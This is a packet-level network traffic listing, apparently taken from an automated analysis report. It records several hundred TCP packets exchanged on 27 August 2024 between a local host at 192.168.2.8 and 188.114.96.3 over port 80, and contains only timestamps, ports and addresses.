                                Aug 27, 2024 09:49:41.515392065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515404940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515419960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.555664062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555727005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555789948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.555826902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555838108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555883884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555888891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.555895090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555905104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.555954933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.599617004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599630117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599638939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599698067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599709034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599719048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599730015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599737883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.599740982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599807024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.599822998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599833965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599843025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599853039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599864006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599867105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.599874973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.599893093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.599909067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600049973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600106955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600116968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600193977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600248098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600256920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600265026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600298882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600342989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600354910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600359917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600370884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600382090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600399017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600399017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600409985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600419998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600419998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600431919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600444078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600461960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600586891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600595951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600605965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600615978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600620985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600632906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600642920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600646019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600652933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600683928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600701094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600711107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600723028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600729942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600734949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600742102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600761890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600866079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600876093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600886106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600895882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600905895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600907087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600914955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600924969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600934982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600941896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600944996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600955963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600965023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.600969076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.600984097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601016998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601116896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601128101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601136923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601146936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601156950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601164103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601166964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601176977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601186991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601196051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601197004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601208925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601217031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601219893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601229906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601237059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601239920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601249933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601255894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601262093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601269960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601275921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601295948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601304054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601434946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601447105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601454973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601464987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601475954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601484060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601485968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601497889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601506948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601515055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601521969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601551056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601551056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601577997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601588011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601598024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601608992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601619005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601624012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601629972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601648092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601672888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601743937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601754904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601766109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601777077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601785898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601788044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601799965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601820946 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601847887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.601957083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601967096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601975918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601985931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.601996899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602005005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602008104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602019072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602027893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602029085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602040052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602046013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602051020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602062941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602082968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602130890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602140903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602150917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602160931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602170944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602185011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602200985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602201939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602210999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602212906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602221966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602233887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602241039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602243900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602253914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602263927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602268934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602274895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602283955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.602288008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.602324963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.642823935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642834902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642846107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642855883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642882109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642891884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642890930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.642904043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642916918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.642931938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.642957926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686507940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686522007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686532021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686603069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686620951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686623096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686634064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686696053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686717033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686728001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686737061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686752081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686774015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686781883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686784983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686794996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686839104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686858892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686868906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686877966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.686899900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686918020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.686994076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687002897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687011003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687045097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687119007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687175035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687201023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687210083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687220097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687252045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687313080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687321901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687328100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687333107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687339067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687387943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687391043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687397957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687402964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687414885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687484980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687489986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687572956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687664986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687685966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687696934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687741995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687777042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687788963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687796116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687802076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687812090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687817097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687838078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687891006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687901020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687903881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.687906981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687911987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687916994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687927008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.687956095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688034058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688043118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688047886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688052893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688056946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688060999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688066006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688071012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688076973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688083887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688175917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688221931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688232899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688237906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688244104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688249111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688252926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688333988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688355923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688375950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688380957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688391924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688395977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688400984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688416958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688422918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688500881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688517094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688527107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688532114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688535929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688548088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688556910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688566923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688571930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688590050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688640118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688652992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688663960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688673973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688774109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688793898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688824892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688836098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688838959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688844919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688853979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688858986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688863993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688868999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688872099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688874960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688879013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688894033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.688947916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.688975096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689095974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689105988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689110994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689116001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689122915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689151049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689160109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689166069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.689177036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689186096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689191103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689192057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.689194918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689199924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689220905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.689265966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.689296007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.729880095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.729901075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.729912043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.729983091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.729995966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.730011940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.730024099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.730035067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.730040073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.730087996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.773653984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.773828983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.773844004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.773855925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.773876905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.773888111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.773899078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.773956060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774049997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774060965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774079084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774089098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774101973 CEST4971580192.168.2.8188.114.96.3
